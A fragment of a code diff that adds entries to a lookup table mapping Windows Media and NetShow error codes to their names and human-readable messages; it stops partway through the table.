+ 0xC0090003: ("ERROR_BIZRULES_NOT_ENABLED", "Business rule scripts are disabled for the calling application."),
+ 0xC00D0005: ("NS_E_NOCONNECTION", "There is no connection established with the Windows Media server. The operation failed."),
+ 0xC00D0006: ("NS_E_CANNOTCONNECT", "Unable to establish a connection to the server."),
+ 0xC00D0007: ("NS_E_CANNOTDESTROYTITLE", "Unable to destroy the title."),
+ 0xC00D0008: ("NS_E_CANNOTRENAMETITLE", "Unable to rename the title."),
+ 0xC00D0009: ("NS_E_CANNOTOFFLINEDISK", "Unable to offline disk."),
+ 0xC00D000A: ("NS_E_CANNOTONLINEDISK", "Unable to online disk."),
+ 0xC00D000B: ("NS_E_NOREGISTEREDWALKER", "There is no file parser registered for this type of file."),
+ 0xC00D000C: ("NS_E_NOFUNNEL", "There is no data connection established."),
+ 0xC00D000D: ("NS_E_NO_LOCALPLAY", "Failed to load the local play DLL."),
+ 0xC00D000E: ("NS_E_NETWORK_BUSY", "The network is busy."),
+ 0xC00D000F: ("NS_E_TOO_MANY_SESS", "The server session limit was exceeded."),
+ 0xC00D0010: ("NS_E_ALREADY_CONNECTED", "The network connection already exists."),
+ 0xC00D0011: ("NS_E_INVALID_INDEX", "Index %1 is invalid."),
+ 0xC00D0012: ("NS_E_PROTOCOL_MISMATCH", "There is no protocol or protocol version supported by both the client and the server."),
+ 0xC00D0013: ("NS_E_TIMEOUT", "The server, a computer set up to offer multimedia content to other computers, could not handle your request for multimedia content in a timely manner. Please try again later."),
+ 0xC00D0014: ("NS_E_NET_WRITE", "Error writing to the network."),
+ 0xC00D0015: ("NS_E_NET_READ", "Error reading from the network."),
+ 0xC00D0016: ("NS_E_DISK_WRITE", "Error writing to a disk."),
+ 0xC00D0017: ("NS_E_DISK_READ", "Error reading from a disk."),
+ 0xC00D0018: ("NS_E_FILE_WRITE", "Error writing to a file."),
+ 0xC00D0019: ("NS_E_FILE_READ", "Error reading from a file."),
+ 0xC00D001A: ("NS_E_FILE_NOT_FOUND", "The system cannot find the file specified."),
+ 0xC00D001B: ("NS_E_FILE_EXISTS", "The file already exists."),
+ 0xC00D001C: ("NS_E_INVALID_NAME", "The file name, directory name, or volume label syntax is incorrect."),
+ 0xC00D001D: ("NS_E_FILE_OPEN_FAILED", "Failed to open a file."),
+ 0xC00D001E: ("NS_E_FILE_ALLOCATION_FAILED", "Unable to allocate a file."),
+ 0xC00D001F: ("NS_E_FILE_INIT_FAILED", "Unable to initialize a file."),
+ 0xC00D0020: ("NS_E_FILE_PLAY_FAILED", "Unable to play a file."),
+ 0xC00D0021: ("NS_E_SET_DISK_UID_FAILED", "Could not set the disk UID."),
+ 0xC00D0022: ("NS_E_INDUCED", "An error was induced for testing purposes."),
+ 0xC00D0023: ("NS_E_CCLINK_DOWN", "Two Content Servers failed to communicate."),
+ 0xC00D0024: ("NS_E_INTERNAL", "An unknown error occurred."),
+ 0xC00D0025: ("NS_E_BUSY", "The requested resource is in use."),
+ 0xC00D0026: ("NS_E_UNRECOGNIZED_STREAM_TYPE", "The specified protocol is not recognized. Be sure that the file name and syntax, such as slashes, are correct for the protocol."),
+ 0xC00D0027: ("NS_E_NETWORK_SERVICE_FAILURE", "The network service provider failed."),
+ 0xC00D0028: ("NS_E_NETWORK_RESOURCE_FAILURE", "An attempt to acquire a network resource failed."),
+ 0xC00D0029: ("NS_E_CONNECTION_FAILURE", "The network connection has failed."),
+ 0xC00D002A: ("NS_E_SHUTDOWN", "The session is being terminated locally."),
+ 0xC00D002B: ("NS_E_INVALID_REQUEST", "The request is invalid in the current state."),
+ 0xC00D002C: ("NS_E_INSUFFICIENT_BANDWIDTH", "There is insufficient bandwidth available to fulfill the request."),
+ 0xC00D002D: ("NS_E_NOT_REBUILDING", "The disk is not rebuilding."),
+ 0xC00D002E: ("NS_E_LATE_OPERATION", "An operation requested for a particular time could not be carried out on schedule."),
+ 0xC00D002F: ("NS_E_INVALID_DATA", "Invalid or corrupt data was encountered."),
+ 0xC00D0030: ("NS_E_FILE_BANDWIDTH_LIMIT", "The bandwidth required to stream a file is higher than the maximum file bandwidth allowed on the server."),
+ 0xC00D0031: ("NS_E_OPEN_FILE_LIMIT", "The client cannot have any more files open simultaneously."),
+ 0xC00D0032: ("NS_E_BAD_CONTROL_DATA", "The server received invalid data from the client on the control connection."),
+ 0xC00D0033: ("NS_E_NO_STREAM", "There is no stream available."),
+ 0xC00D0034: ("NS_E_STREAM_END", "There is no more data in the stream."),
+ 0xC00D0035: ("NS_E_SERVER_NOT_FOUND", "The specified server could not be found."),
+ 0xC00D0036: ("NS_E_DUPLICATE_NAME", "The specified name is already in use."),
+ 0xC00D0037: ("NS_E_DUPLICATE_ADDRESS", "The specified address is already in use."),
+ 0xC00D0038: ("NS_E_BAD_MULTICAST_ADDRESS", "The specified address is not a valid multicast address."),
+ 0xC00D0039: ("NS_E_BAD_ADAPTER_ADDRESS", "The specified adapter address is invalid."),
+ 0xC00D003A: ("NS_E_BAD_DELIVERY_MODE", "The specified delivery mode is invalid."),
+ 0xC00D003B: ("NS_E_INVALID_CHANNEL", "The specified station does not exist."),
+ 0xC00D003C: ("NS_E_INVALID_STREAM", "The specified stream does not exist."),
+ 0xC00D003D: ("NS_E_INVALID_ARCHIVE", "The specified archive could not be opened."),
+ 0xC00D003E: ("NS_E_NOTITLES", "The system cannot find any titles on the server."),
+ 0xC00D003F: ("NS_E_INVALID_CLIENT", "The system cannot find the client specified."),
+ 0xC00D0040: ("NS_E_INVALID_BLACKHOLE_ADDRESS", "The Blackhole Address is not initialized."),
+ 0xC00D0041: ("NS_E_INCOMPATIBLE_FORMAT", "The station does not support the stream format."),
+ 0xC00D0042: ("NS_E_INVALID_KEY", "The specified key is not valid."),
+ 0xC00D0043: ("NS_E_INVALID_PORT", "The specified port is not valid."),
+ 0xC00D0044: ("NS_E_INVALID_TTL", "The specified TTL is not valid."),
+ 0xC00D0045: ("NS_E_STRIDE_REFUSED", "The request to fast forward or rewind could not be fulfilled."),
+ 0xC00D0046: ("NS_E_MMSAUTOSERVER_CANTFINDWALKER", "Unable to load the appropriate file parser."),
+ 0xC00D0047: ("NS_E_MAX_BITRATE", "Cannot exceed the maximum bandwidth limit."),
+ 0xC00D0048: ("NS_E_LOGFILEPERIOD", "Invalid value for LogFilePeriod."),
+ 0xC00D0049: ("NS_E_MAX_CLIENTS", "Cannot exceed the maximum client limit."),
+ 0xC00D004A: ("NS_E_LOG_FILE_SIZE", "The maximum log file size has been reached."),
+ 0xC00D004B: ("NS_E_MAX_FILERATE", "Cannot exceed the maximum file rate."),
+ 0xC00D004C: ("NS_E_WALKER_UNKNOWN", "Unknown file type."),
+ 0xC00D004D: ("NS_E_WALKER_SERVER", "The specified file, %1, cannot be loaded onto the specified server, %2."),
+ 0xC00D004E: ("NS_E_WALKER_USAGE", "There was a usage error with file parser."),
+ 0xC00D0050: ("NS_E_TIGER_FAIL", "The Title Server %1 has failed."),
+ 0xC00D0053: ("NS_E_CUB_FAIL", "Content Server %1 (%2) has failed."),
+ 0xC00D0055: ("NS_E_DISK_FAIL", "Disk %1 ( %2 ) on Content Server %3, has failed."),
+ 0xC00D0060: ("NS_E_MAX_FUNNELS_ALERT", "The NetShow data stream limit of %1 streams was reached."),
+ 0xC00D0061: ("NS_E_ALLOCATE_FILE_FAIL", "The NetShow Video Server was unable to allocate a %1 block file named %2."),
+ 0xC00D0062: ("NS_E_PAGING_ERROR", "A Content Server was unable to page a block."),
+ 0xC00D0063: ("NS_E_BAD_BLOCK0_VERSION", "Disk %1 has unrecognized control block version %2."),
+ 0xC00D0064: ("NS_E_BAD_DISK_UID", "Disk %1 has incorrect uid %2."),
+ 0xC00D0065: ("NS_E_BAD_FSMAJOR_VERSION", "Disk %1 has unsupported file system major version %2."),
+ 0xC00D0066: ("NS_E_BAD_STAMPNUMBER", "Disk %1 has bad stamp number in control block."),
+ 0xC00D0067: ("NS_E_PARTIALLY_REBUILT_DISK", "Disk %1 is partially reconstructed."),
+ 0xC00D0068: ("NS_E_ENACTPLAN_GIVEUP", "EnactPlan gives up."),
+ 0xC00D006A: ("MCMADM_E_REGKEY_NOT_FOUND", "The key was not found in the registry."),
+ 0xC00D006B: ("NS_E_NO_FORMATS", "The publishing point cannot be started because the server does not have the appropriate stream formats. Use the Multicast Announcement Wizard to create a new announcement for this publishing point."),
+ 0xC00D006C: ("NS_E_NO_REFERENCES", "No reference URLs were found in an ASX file."),
+ 0xC00D006D: ("NS_E_WAVE_OPEN", "Error opening wave device, the device might be in use."),
+ 0xC00D006F: ("NS_E_CANNOTCONNECTEVENTS", "Unable to establish a connection to the NetShow event monitor service."),
+ 0xC00D0071: ("NS_E_NO_DEVICE", "No device driver is present on the system."),
+ 0xC00D0072: ("NS_E_NO_SPECIFIED_DEVICE", "No specified device driver is present."),
+ 0xC00D00C8: ("NS_E_MONITOR_GIVEUP", "Netshow Events Monitor is not operational and has been disconnected."),
+ 0xC00D00C9: ("NS_E_REMIRRORED_DISK", "Disk %1 is remirrored."),
+ 0xC00D00CA: ("NS_E_INSUFFICIENT_DATA", "Insufficient data found."),
+ 0xC00D00CB: ("NS_E_ASSERT", "1 failed in file %2 line %3."),
+ 0xC00D00CC: ("NS_E_BAD_ADAPTER_NAME", "The specified adapter name is invalid."),
+ 0xC00D00CD: ("NS_E_NOT_LICENSED", "The application is not licensed for this feature."),
+ 0xC00D00CE: ("NS_E_NO_SERVER_CONTACT", "Unable to contact the server."),
+ 0xC00D00CF: ("NS_E_TOO_MANY_TITLES", "Maximum number of titles exceeded."),
+ 0xC00D00D0: ("NS_E_TITLE_SIZE_EXCEEDED", "Maximum size of a title exceeded."),
+ 0xC00D00D1: ("NS_E_UDP_DISABLED", "UDP protocol not enabled. Not trying %1!ls!."),
+ 0xC00D00D2: ("NS_E_TCP_DISABLED", "TCP protocol not enabled. Not trying %1!ls!."),
+ 0xC00D00D3: ("NS_E_HTTP_DISABLED", "HTTP protocol not enabled. Not trying %1!ls!."),
+ 0xC00D00D4: ("NS_E_LICENSE_EXPIRED", "The product license has expired."),
+ 0xC00D00D5: ("NS_E_TITLE_BITRATE", "Source file exceeds the per title maximum bitrate. See NetShow Theater documentation for more information."),
+ 0xC00D00D6: ("NS_E_EMPTY_PROGRAM_NAME", "The program name cannot be empty."),
+ 0xC00D00D7: ("NS_E_MISSING_CHANNEL", "Station %1 does not exist."),
+ 0xC00D00D8: ("NS_E_NO_CHANNELS", "You need to define at least one station before this operation can complete."),
+ 0xC00D00D9: ("NS_E_INVALID_INDEX2", "The index specified is invalid."),
+ 0xC00D0190: ("NS_E_CUB_FAIL_LINK", "Content Server %1 (%2) has failed its link to Content Server %3."),
+ 0xC00D0192: ("NS_E_BAD_CUB_UID", "Content Server %1 (%2) has incorrect uid %3."),
+ 0xC00D0195: ("NS_E_GLITCH_MODE", "Server unreliable because multiple components failed."),
+ 0xC00D019B: ("NS_E_NO_MEDIA_PROTOCOL", "Content Server %1 (%2) is unable to communicate with the Media System Network Protocol."),
+ 0xC00D07F1: ("NS_E_NOTHING_TO_DO", "Nothing to do."),
+ 0xC00D07F2: ("NS_E_NO_MULTICAST", "Not receiving data from the server."),
+ 0xC00D0BB8: ("NS_E_INVALID_INPUT_FORMAT", "The input media format is invalid."),
+ 0xC00D0BB9: ("NS_E_MSAUDIO_NOT_INSTALLED", "The MSAudio codec is not installed on this system."),
+ 0xC00D0BBA: ("NS_E_UNEXPECTED_MSAUDIO_ERROR", "An unexpected error occurred with the MSAudio codec."),
+ 0xC00D0BBB: ("NS_E_INVALID_OUTPUT_FORMAT", "The output media format is invalid."),
+ 0xC00D0BBC: ("NS_E_NOT_CONFIGURED", "The object must be fully configured before audio samples can be processed."),
+ 0xC00D0BBD: ("NS_E_PROTECTED_CONTENT", "You need a license to perform the requested operation on this media file."),
+ 0xC00D0BBE: ("NS_E_LICENSE_REQUIRED", "You need a license to perform the requested operation on this media file."),
+ 0xC00D0BBF: ("NS_E_TAMPERED_CONTENT", "This media file is corrupted or invalid. Contact the content provider for a new file."),
+ 0xC00D0BC0: ("NS_E_LICENSE_OUTOFDATE", "The license for this media file has expired. Get a new license or contact the content provider for further assistance."),
+ 0xC00D0BC1: ("NS_E_LICENSE_INCORRECT_RIGHTS", "You are not allowed to open this file. Contact the content provider for further assistance."),
+ 0xC00D0BC2: ("NS_E_AUDIO_CODEC_NOT_INSTALLED", "The requested audio codec is not installed on this system."),
+ 0xC00D0BC3: ("NS_E_AUDIO_CODEC_ERROR", "An unexpected error occurred with the audio codec."),
+ 0xC00D0BC4: ("NS_E_VIDEO_CODEC_NOT_INSTALLED", "The requested video codec is not installed on this system."),
+ 0xC00D0BC5: ("NS_E_VIDEO_CODEC_ERROR", "An unexpected error occurred with the video codec."),
+ 0xC00D0BC6: ("NS_E_INVALIDPROFILE", "The Profile is invalid."),
+ 0xC00D0BC7: ("NS_E_INCOMPATIBLE_VERSION", "A new version of the SDK is needed to play the requested content."),
+ 0xC00D0BCA: ("NS_E_OFFLINE_MODE", "The requested URL is not available in offline mode."),
+ 0xC00D0BCB: ("NS_E_NOT_CONNECTED", "The requested URL cannot be accessed because there is no network connection."),
+ 0xC00D0BCC: ("NS_E_TOO_MUCH_DATA", "The encoding process was unable to keep up with the amount of supplied data."),
+ 0xC00D0BCD: ("NS_E_UNSUPPORTED_PROPERTY", "The given property is not supported."),
+ 0xC00D0BCE: ("NS_E_8BIT_WAVE_UNSUPPORTED", "Windows Media Player cannot copy the files to the CD because they are 8-bit. Convert the files to 16-bit, 44-kHz stereo files by using Sound Recorder or another audio-processing program, and then try again."),
+ 0xC00D0BCF: ("NS_E_NO_MORE_SAMPLES", "There are no more samples in the current range."),
+ 0xC00D0BD0: ("NS_E_INVALID_SAMPLING_RATE", "The given sampling rate is invalid."),
+ 0xC00D0BD1: ("NS_E_MAX_PACKET_SIZE_TOO_SMALL", "The given maximum packet size is too small to accommodate this profile.)"),
+ 0xC00D0BD2: ("NS_E_LATE_PACKET", "The packet arrived too late to be of use."),
+ 0xC00D0BD3: ("NS_E_DUPLICATE_PACKET", "The packet is a duplicate of one received before."),
+ 0xC00D0BD4: ("NS_E_SDK_BUFFERTOOSMALL", "Supplied buffer is too small."),
+ 0xC00D0BD5: ("NS_E_INVALID_NUM_PASSES", "The wrong number of preprocessing passes was used for the stream's output type."),
+ 0xC00D0BD6: ("NS_E_ATTRIBUTE_READ_ONLY", "An attempt was made to add, modify, or delete a read only attribute."),
+ 0xC00D0BD7: ("NS_E_ATTRIBUTE_NOT_ALLOWED", "An attempt was made to add attribute that is not allowed for the given media type."),
+ 0xC00D0BD8: ("NS_E_INVALID_EDL", "The EDL provided is invalid."),
+ 0xC00D0BD9: ("NS_E_DATA_UNIT_EXTENSION_TOO_LARGE", "The Data Unit Extension data was too large to be used."),
+ 0xC00D0BDA: ("NS_E_CODEC_DMO_ERROR", "An unexpected error occurred with a DMO codec."),
+ 0xC00D0BDC: ("NS_E_FEATURE_DISABLED_BY_GROUP_POLICY", "This feature has been disabled by group policy."),
+ 0xC00D0BDD: ("NS_E_FEATURE_DISABLED_IN_SKU", "This feature is disabled in this SKU."),
+ 0xC00D0FA0: ("NS_E_NO_CD", "There is no CD in the CD drive. Insert a CD, and then try again."),
+ 0xC00D0FA1: ("NS_E_CANT_READ_DIGITAL", "Windows Media Player could not use digital playback to play the CD. To switch to analog playback, on the Tools menu, click Options, and then click the Devices tab. Double-click the CD drive, and then in the Playback area, click Analog. For additional assistance, click Web Help."),
+ 0xC00D0FA2: ("NS_E_DEVICE_DISCONNECTED", "Windows Media Player no longer detects a connected portable device. Reconnect your portable device, and then try synchronizing the file again."),
+ 0xC00D0FA3: ("NS_E_DEVICE_NOT_SUPPORT_FORMAT", "Windows Media Player cannot play the file. The portable device does not support the specified file type."),
+ 0xC00D0FA4: ("NS_E_SLOW_READ_DIGITAL", "Windows Media Player could not use digital playback to play the CD. The Player has automatically switched the CD drive to analog playback. To switch back to digital CD playback, use the Devices tab. For additional assistance, click Web Help."),
+ 0xC00D0FA5: ("NS_E_MIXER_INVALID_LINE", "An invalid line error occurred in the mixer."),
+ 0xC00D0FA6: ("NS_E_MIXER_INVALID_CONTROL", "An invalid control error occurred in the mixer."),
+ 0xC00D0FA7: ("NS_E_MIXER_INVALID_VALUE", "An invalid value error occurred in the mixer."),
+ 0xC00D0FA8: ("NS_E_MIXER_UNKNOWN_MMRESULT", "An unrecognized MMRESULT occurred in the mixer."),
+ 0xC00D0FA9: ("NS_E_USER_STOP", "User has stopped the operation."),
+ 0xC00D0FAA: ("NS_E_MP3_FORMAT_NOT_FOUND", "Windows Media Player cannot rip the track because a compatible MP3 encoder is not installed on your computer. Install a compatible MP3 encoder or choose a different format to rip to (such as Windows Media Audio)."),
+ 0xC00D0FAB: ("NS_E_CD_READ_ERROR_NO_CORRECTION", "Windows Media Player cannot read the CD. The disc might be dirty or damaged. Turn on error correction, and then try again."),
+ 0xC00D0FAC: ("NS_E_CD_READ_ERROR", "Windows Media Player cannot read the CD. The disc might be dirty or damaged or the CD drive might be malfunctioning."),
+ 0xC00D0FAD: ("NS_E_CD_SLOW_COPY", "For best performance, do not play CD tracks while ripping them."),
+ 0xC00D0FAE: ("NS_E_CD_COPYTO_CD", "It is not possible to directly burn tracks from one CD to another CD. You must first rip the tracks from the CD to your computer, and then burn the files to a blank CD."),
+ 0xC00D0FAF: ("NS_E_MIXER_NODRIVER", "Could not open a sound mixer driver."),
+ 0xC00D0FB0: ("NS_E_REDBOOK_ENABLED_WHILE_COPYING", "Windows Media Player cannot rip tracks from the CD correctly because the CD drive settings in Device Manager do not match the CD drive settings in the Player."),
+ 0xC00D0FB1: ("NS_E_CD_REFRESH", "Windows Media Player is busy reading the CD."),
+ 0xC00D0FB2: ("NS_E_CD_DRIVER_PROBLEM", "Windows Media Player could not use digital playback to play the CD. The Player has automatically switched the CD drive to analog playback. To switch back to digital CD playback, use the Devices tab. For additional assistance, click Web Help."),
+ 0xC00D0FB3: ("NS_E_WONT_DO_DIGITAL", "Windows Media Player could not use digital playback to play the CD. The Player has automatically switched the CD drive to analog playback. To switch back to digital CD playback, use the Devices tab. For additional assistance, click Web Help."),
+ 0xC00D0FB4: ("NS_E_WMPXML_NOERROR", "A call was made to GetParseError on the XML parser but there was no error to retrieve."),
+ 0xC00D0FB5: ("NS_E_WMPXML_ENDOFDATA", "The XML Parser ran out of data while parsing."),
+ 0xC00D0FB6: ("NS_E_WMPXML_PARSEERROR", "A generic parse error occurred in the XML parser but no information is available."),
+ 0xC00D0FB7: ("NS_E_WMPXML_ATTRIBUTENOTFOUND", "A call get GetNamedAttribute or GetNamedAttributeIndex on the XML parser resulted in the index not being found."),
+ 0xC00D0FB8: ("NS_E_WMPXML_PINOTFOUND", "A call was made go GetNamedPI on the XML parser, but the requested Processing Instruction was not found."),
+ 0xC00D0FB9: ("NS_E_WMPXML_EMPTYDOC", "Persist was called on the XML parser, but the parser has no data to persist."),
+ 0xC00D0FBA: ("NS_E_WMP_PATH_ALREADY_IN_LIBRARY", "This file path is already in the library."),
+ 0xC00D0FBE: ("NS_E_WMP_FILESCANALREADYSTARTED", "Windows Media Player is already searching for files to add to your library. Wait for the current process to finish before attempting to search again."),
+ 0xC00D0FBF: ("NS_E_WMP_HME_INVALIDOBJECTID", "Windows Media Player is unable to find the media you are looking for."),
+ 0xC00D0FC0: ("NS_E_WMP_MF_CODE_EXPIRED", "A component of Windows Media Player is out-of-date. If you are running a pre-release version of Windows, try upgrading to a more recent version."),
+ 0xC00D0FC1: ("NS_E_WMP_HME_NOTSEARCHABLEFORITEMS", "This container does not support search on items."),
+ 0xC00D0FC7: ("NS_E_WMP_ADDTOLIBRARY_FAILED", "Windows Media Player encountered a problem while adding one or more files to the library. For additional assistance, click Web Help."),
+ 0xC00D0FC8: ("NS_E_WMP_WINDOWSAPIFAILURE", "A Windows API call failed but no error information was available."),
+ 0xC00D0FC9: ("NS_E_WMP_RECORDING_NOT_ALLOWED", "This file does not have burn rights. If you obtained this file from an online store, go to the online store to get burn rights."),
+ 0xC00D0FCA: ("NS_E_DEVICE_NOT_READY", "Windows Media Player no longer detects a connected portable device. Reconnect your portable device, and then try to sync the file again."),
+ 0xC00D0FCB: ("NS_E_DAMAGED_FILE", "Windows Media Player cannot play the file because it is corrupted."),
+ 0xC00D0FCC: ("NS_E_MPDB_GENERIC", "Windows Media Player encountered an error while attempting to access information in the library. Try restarting the Player."),
+ 0xC00D0FCD: ("NS_E_FILE_FAILED_CHECKS", "The file cannot be added to the library because it is smaller than the \"Skip files smaller than\" setting. To add the file, change the setting on the Library tab. For additional assistance, click Web Help."),
+ 0xC00D0FCE: ("NS_E_MEDIA_LIBRARY_FAILED", "Windows Media Player cannot create the library. You must be logged on as an administrator or a member of the Administrators group to install the Player. For more information, contact your system administrator."),
+ 0xC00D0FCF: ("NS_E_SHARING_VIOLATION", "The file is already in use. Close other programs that might be using the file, or stop playing the file, and then try again."),
+ 0xC00D0FD0: ("NS_E_NO_ERROR_STRING_FOUND", "Windows Media Player has encountered an unknown error."),
+ 0xC00D0FD1: ("NS_E_WMPOCX_NO_REMOTE_CORE", "The Windows Media Player ActiveX control cannot connect to remote media services, but will continue with local media services."),
+ 0xC00D0FD2: ("NS_E_WMPOCX_NO_ACTIVE_CORE", "The requested method or property is not available because the Windows Media Player ActiveX control has not been properly activated."),
+ 0xC00D0FD3: ("NS_E_WMPOCX_NOT_RUNNING_REMOTELY", "The Windows Media Player ActiveX control is not running in remote mode."),
+ 0xC00D0FD4: ("NS_E_WMPOCX_NO_REMOTE_WINDOW", "An error occurred while trying to get the remote Windows Media Player window."),
+ 0xC00D0FD5: ("NS_E_WMPOCX_ERRORMANAGERNOTAVAILABLE", "Windows Media Player has encountered an unknown error."),
+ 0xC00D0FD6: ("NS_E_PLUGIN_NOTSHUTDOWN", "Windows Media Player was not closed properly. A damaged or incompatible plug-in might have caused the problem to occur. As a precaution, all optional plug-ins have been disabled."),
+ 0xC00D0FD7: ("NS_E_WMP_CANNOT_FIND_FOLDER", "Windows Media Player cannot find the specified path. Verify that the path is typed correctly. If it is, the path does not exist in the specified location, or the computer where the path is located is not available."),
+ 0xC00D0FD8: ("NS_E_WMP_STREAMING_RECORDING_NOT_ALLOWED", "Windows Media Player cannot save a file that is being streamed."),
+ 0xC00D0FD9: ("NS_E_WMP_PLUGINDLL_NOTFOUND", "Windows Media Player cannot find the selected plug-in. The Player will try to remove it from the menu. To use this plug-in, install it again."),
+ 0xC00D0FDA: ("NS_E_NEED_TO_ASK_USER", "Action requires input from the user."),
+ 0xC00D0FDB: ("NS_E_WMPOCX_PLAYER_NOT_DOCKED", "The Windows Media Player ActiveX control must be in a docked state for this action to be performed."),
+ 0xC00D0FDC: ("NS_E_WMP_EXTERNAL_NOTREADY", "The Windows Media Player external object is not ready."),
+ 0xC00D0FDD: ("NS_E_WMP_MLS_STALE_DATA", "Windows Media Player cannot perform the requested action. Your computer's time and date might not be set correctly."),
+ 0xC00D0FDE: ("NS_E_WMP_UI_SUBCONTROLSNOTSUPPORTED", "The control (%s) does not support creation of sub-controls, yet (%d) sub-controls have been specified."),
+ 0xC00D0FDF: ("NS_E_WMP_UI_VERSIONMISMATCH", "Version mismatch: (%.1f required, %.1f found)."),
+ 0xC00D0FE0: ("NS_E_WMP_UI_NOTATHEMEFILE", "The layout manager was given valid XML that wasn't a theme file."),
+ 0xC00D0FE1: ("NS_E_WMP_UI_SUBELEMENTNOTFOUND", "The %s subelement could not be found on the %s object."),
+ 0xC00D0FE2: ("NS_E_WMP_UI_VERSIONPARSE", "An error occurred parsing the version tag. Valid version tags are of the form: ."),
+ 0xC00D0FE3: ("NS_E_WMP_UI_VIEWIDNOTFOUND", "The view specified in for the 'currentViewID' property (%s) was not found in this theme file."),
+ 0xC00D0FE4: ("NS_E_WMP_UI_PASSTHROUGH", "This error used internally for hit testing."),
+ 0xC00D0FE5: ("NS_E_WMP_UI_OBJECTNOTFOUND", "Attributes were specified for the %s object, but the object was not available to send them to."),
+ 0xC00D0FE6: ("NS_E_WMP_UI_SECONDHANDLER", "The %s event already has a handler, the second handler was ignored."),
+ 0xC00D0FE7: ("NS_E_WMP_UI_NOSKININZIP", "No .wms file found in skin archive."),
+ 0xC00D0FEA: ("NS_E_WMP_URLDOWNLOADFAILED", "Windows Media Player encountered a problem while downloading the file. For additional assistance, click Web Help."),
+ 0xC00D0FEB: ("NS_E_WMPOCX_UNABLE_TO_LOAD_SKIN", "The Windows Media Player ActiveX control cannot load the requested uiMode and cannot roll back to the existing uiMode."),
+ 0xC00D0FEC: ("NS_E_WMP_INVALID_SKIN", "Windows Media Player encountered a problem with the skin file. The skin file might not be valid."),
+ 0xC00D0FED: ("NS_E_WMP_SENDMAILFAILED", "Windows Media Player cannot send the link because your email program is not responding. Verify that your email program is configured properly, and then try again. For more information about email, see Windows Help."),
+ 0xC00D0FEE: ("NS_E_WMP_LOCKEDINSKINMODE", "Windows Media Player cannot switch to full mode because your computer administrator has locked this skin."),
+ 0xC00D0FEF: ("NS_E_WMP_FAILED_TO_SAVE_FILE", "Windows Media Player encountered a problem while saving the file. For additional assistance, click Web Help."),
+ 0xC00D0FF0: ("NS_E_WMP_SAVEAS_READONLY", "Windows Media Player cannot overwrite a read-only file. Try using a different file name."),
+ 0xC00D0FF1: ("NS_E_WMP_FAILED_TO_SAVE_PLAYLIST", "Windows Media Player encountered a problem while creating or saving the playlist. For additional assistance, click Web Help."),
+ 0xC00D0FF2: ("NS_E_WMP_FAILED_TO_OPEN_WMD", "Windows Media Player cannot open the Windows Media Download file. The file might be damaged."),
+ 0xC00D0FF3: ("NS_E_WMP_CANT_PLAY_PROTECTED", "The file cannot be added to the library because it is a protected DVR-MS file. This content cannot be played back by Windows Media Player."),
+ 0xC00D0FF4: ("NS_E_SHARING_STATE_OUT_OF_SYNC", "Media sharing has been turned off because a required Windows setting or component has changed. For additional assistance, click Web Help."),
+ 0xC00D0FFA: ("NS_E_WMPOCX_REMOTE_PLAYER_ALREADY_RUNNING", "Exclusive Services launch failed because the Windows Media Player is already running."),
+ 0xC00D1004: ("NS_E_WMP_RBC_JPGMAPPINGIMAGE", "JPG Images are not recommended for use as a mappingImage."),
+ 0xC00D1005: ("NS_E_WMP_JPGTRANSPARENCY", "JPG Images are not recommended when using a transparencyColor."),
+ 0xC00D1009: ("NS_E_WMP_INVALID_MAX_VAL", "The Max property cannot be less than Min property."),
+ 0xC00D100A: ("NS_E_WMP_INVALID_MIN_VAL", "The Min property cannot be greater than Max property."),
+ 0xC00D100E: ("NS_E_WMP_CS_JPGPOSITIONIMAGE", "JPG Images are not recommended for use as a positionImage."),
+ 0xC00D100F: ("NS_E_WMP_CS_NOTEVENLYDIVISIBLE", "The (%s) image's size is not evenly divisible by the positionImage's size."),
+ 0xC00D1018: ("NS_E_WMPZIP_NOTAZIPFILE", "The ZIP reader opened a file and its signature did not match that of the ZIP files."),
+ 0xC00D1019: ("NS_E_WMPZIP_CORRUPT", "The ZIP reader has detected that the file is corrupted."),
+ 0xC00D101A: ("NS_E_WMPZIP_FILENOTFOUND", "GetFileStream, SaveToFile, or SaveTemp file was called on the ZIP reader with a file name that was not found in the ZIP file."),
+ 0xC00D1022: ("NS_E_WMP_IMAGE_FILETYPE_UNSUPPORTED", "Image type not supported."),
+ 0xC00D1023: ("NS_E_WMP_IMAGE_INVALID_FORMAT", "Image file may be corrupt."),
+ 0xC00D1024: ("NS_E_WMP_GIF_UNEXPECTED_ENDOFFILE", "Unexpected end of file. GIF file may be corrupt."),
+ 0xC00D1025: ("NS_E_WMP_GIF_INVALID_FORMAT", "Invalid GIF file."),
+ 0xC00D1026: ("NS_E_WMP_GIF_BAD_VERSION_NUMBER", "Invalid GIF version. Only 87a or 89a supported."),
+ 0xC00D1027: ("NS_E_WMP_GIF_NO_IMAGE_IN_FILE", "No images found in GIF file."),
+ 0xC00D1028: ("NS_E_WMP_PNG_INVALIDFORMAT", "Invalid PNG image file format."),
+ 0xC00D1029: ("NS_E_WMP_PNG_UNSUPPORTED_BITDEPTH", "PNG bitdepth not supported."),
+ 0xC00D102A: ("NS_E_WMP_PNG_UNSUPPORTED_COMPRESSION", "Compression format defined in PNG file not supported,"),
+ 0xC00D102B: ("NS_E_WMP_PNG_UNSUPPORTED_FILTER", "Filter method defined in PNG file not supported."),
+ 0xC00D102C: ("NS_E_WMP_PNG_UNSUPPORTED_INTERLACE", "Interlace method defined in PNG file not supported."),
+ 0xC00D102D: ("NS_E_WMP_PNG_UNSUPPORTED_BAD_CRC", "Bad CRC in PNG file."),
+ 0xC00D102E: ("NS_E_WMP_BMP_INVALID_BITMASK", "Invalid bitmask in BMP file."),
+ 0xC00D102F: ("NS_E_WMP_BMP_TOPDOWN_DIB_UNSUPPORTED", "Topdown DIB not supported."),
+ 0xC00D1030: ("NS_E_WMP_BMP_BITMAP_NOT_CREATED", "Bitmap could not be created."),
+ 0xC00D1031: ("NS_E_WMP_BMP_COMPRESSION_UNSUPPORTED", "Compression format defined in BMP not supported."),
+ 0xC00D1032: ("NS_E_WMP_BMP_INVALID_FORMAT", "Invalid Bitmap format."),
+ 0xC00D1033: ("NS_E_WMP_JPG_JERR_ARITHCODING_NOTIMPL", "JPEG Arithmetic coding not supported."),
+ 0xC00D1034: ("NS_E_WMP_JPG_INVALID_FORMAT", "Invalid JPEG format."),
+ 0xC00D1035: ("NS_E_WMP_JPG_BAD_DCTSIZE", "Invalid JPEG format."),
+ 0xC00D1036: ("NS_E_WMP_JPG_BAD_VERSION_NUMBER", "Internal version error. Unexpected JPEG library version."),
